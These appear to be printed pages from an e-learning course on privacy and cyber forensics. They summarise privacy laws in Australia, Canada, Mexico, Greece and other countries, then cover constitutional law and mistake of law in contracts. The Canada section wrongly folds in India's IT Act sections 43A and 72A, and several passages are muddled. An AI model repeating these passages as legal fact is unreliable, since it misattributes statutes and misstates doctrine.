Privacy and Cyber Forensics 8/17/2015
scorm content
Privacy law
It refers to the laws which deal with the regulation of personal information about individuals which can be collected by governments and other public as well as private organizations and its storage and use.
Classification of Privacy law The privacy law is classified as two types. They are as follows; General privacy laws Specific privacy laws
General privacy laws General privacy law is one of the privacy law. They have overall bearing on the personal information of individuals. They affect the policies that govern many different areas of information.
Specific privacy laws These laws are designed to regulate specific types of information. Some examples include: Health privacy laws Financial privacy laws Online privacy laws Communication privacy laws Information privacy laws
Privacy laws In Australia The current state of privacy law in Australia includes, Federal and state information privacy legislation, some sectorspecific privacy legislation at state level, regulation of the media and some criminal sanctions. The Australian Law Reform Commission recommended the enactment of a statutory cause of action for invasion of privacy.
Privacy laws In Brazil A Brazilian citizen′s privacy is protected by the country′s constitution, which states: The intimacy, private life, honor and image of the people are inviolable, with assured right to indention by material or moral damage resulting from its violation.
Privacy laws In Canada file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit9/assets/2.html Page 131 of 135
1/3
Privacy and Cyber Forensics 8/17/2015
scorm content
In Canada, the federal Personal Information Protection and Electronic Documents Act (PIPEDA) governs the collection, use and disclosure of personal information in connection with commercial activities and personal information about employees of federal works, undertakings and businesses. It generally does not apply to noncommercial organizations or provincial governments. Personal information collected, used and disclosed by the federal government. Previously, the Information Technology (Amendment) Act, added the following two sections relating to Privacy: Section 43A, which deals with implementation of reasonable security practices for sensitive personal information. It provides for the compensation of the person affected by wrongful loss or wrongful gain. Section 72A, which provides for imprisonment for a period up to 3 years or a fine up to Rs. 5,00,000 for a person.
Privacy laws In Mexico In July 5, 2010, Mexico passed a new privacy package focused on treatment of personal data by private entities. The key elements included where: Requirement of all private entities who gather personal data to publish their privacy policy in accordance to the law. Set fines for up to $16,000,000 MXN in case of violation of the law. Set prison penalties to serious violations.
Privacy laws In New Zealand In New Zealand, the Privacy Act 1993 sets out principles in relation to the collection, use, disclosure, security. It also in relation to access the personal information. The introduction into the New Zealand common law of a tort covering invasion of personal privacy. Complaints about privacy are considered by the Privacy Commissioner.
Privacy laws In Republic of China (Taiwan) Computer Processed Personal Information Protection Act was enacted in 1995 in order to protect personal information processed by computers. The general provision specified the purpose of the law, defined crucial terms, prohibited individuals from waiving certain rights.
Privacy laws In Russia file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit9/assets/2.html Page 132 of 135
2/3
Privacy and Cyber Forensics 8/17/2015
scorm content
Data protection principles and legislation in the Russian Federation (in English). Online database of the Russian laws (in Russian). Federal Service on supervising in the sphere of communications, information technology and mass media (in Russian).
Privacy laws In United Kingdom As a member of the European Convention on Human Rights, the United Kingdom adheres to Article 8 ECHR, which guarantees a "right to respect for privacy and family life" from state parties, subject to restrictions as prescribed by law and necessary in a democratic society towards a legitimate aim.
Privacy laws In United States The right to privacy is not explicitly stated anywhere in the Bill of Rights. The idea of a right to privacy was first addressed within a legal context in the United States. Louis Brandeis (later a Supreme Court justice) and another young lawyer, Samuel D. Warren, published an article called "The Right to Privacy" in the Harvard Law Review in 1890 arguing that the U.S. Constitution and common law allowed for the deduction of a general "right to privacy".
Privacy laws In Greece Taking a picture of a person in a public space: Requires consent. Taking a photo or video of someone or drawing them in a painting constitutes an illegal act by itself according to Article 57 of the Greek Civil Code. The law assumes that consent has been provided silently if the depicted person has been paid for the photography session. The law 2472/1997 also applies in many circumstances, even in photographing. Greece also requires photographers to obtain a government permit before photographing people participating in political protests in public places.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit9/assets/2.html Page 133 of 135
3/3
Privacy and Cyber Forensics 8/17/2015
scorm content
Constitutional law
Constitutional law is the body of law which defines the relationship of different entities within a State, namely, the executive, the legislature, and the judiciary.
Human rights Human rights or civil liberties form a crucial part of a country′s constitution and govern the rights of the individual against the state. Most jurisdictions, like the United States and France. They have a codified constitution, with a bill of rights.
Legislative procedure Another main function of constitutions may be to describe the procedure by which parliaments may legislate. For instance, special majorities may be required to alter the constitution.
In bicameral legislatures There may be a process laid out for second or third readings of bills before a new law can enter into force. Alternatively, there may further be requirements for maximum terms. That a government can keep power before holding an election.
Study of constitutional law Constitutional law is a major focus of legal studies and research. For example, most law students in the United States are required to take a class in Constitutional Law during their first year. Several law journals are devoted to the discussion of constitutional issues.
The Rule of Law Dicey identified three essential elements of the British Constitution rule of law: Absence of arbitrary power; Equality before the law; The Constitution is a result of the ordinary law of the land.
Legal liability Legal liability is the legal bound obligation to pay debts. file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit9/assets/3.html Page 134 of 135
1/2
Privacy and Cyber Forensics 8/17/2015
scorm content
It utilize the rule of law.
Mistake of law When a party enters into a contract, without the knowledge of the law, the contract is affected by such mistakes But it is not void. A contract is not voidable because it was caused by a mistake. The reason here is that ignorance of law is not an excuse at all.
Mistake of Fact Where both the parties enter into an agreement are under a mistake as to a matter of fact essential to the agreement, the agreement is void.
Common mistake A common mistake is occur in sometimes where both parties hold the same mistaken belief of the facts.
Mistake classification The mistake is classified into two types. They are, Mistake of Law When a party enters into a contract, without the knowledge of the law. Mistake of Fact Where both the parties enter into an agreement.
file:///D:/NIELIT%20PROJECT/Final%20Product/TEKMINDZ/Cyber%20Forensic/unit9/assets/3.html Page 135 of 135
2/2
More Documents from "Arup Saha"
Cyber.pdf
June 2020 4
Office 2003 Group Policies
May 2020 9
Csir002
April 2020 15
Analyzing Gene Expression And Regulation
May 2020 16
Vat Invoicing In Busy 3.0
April 2020 16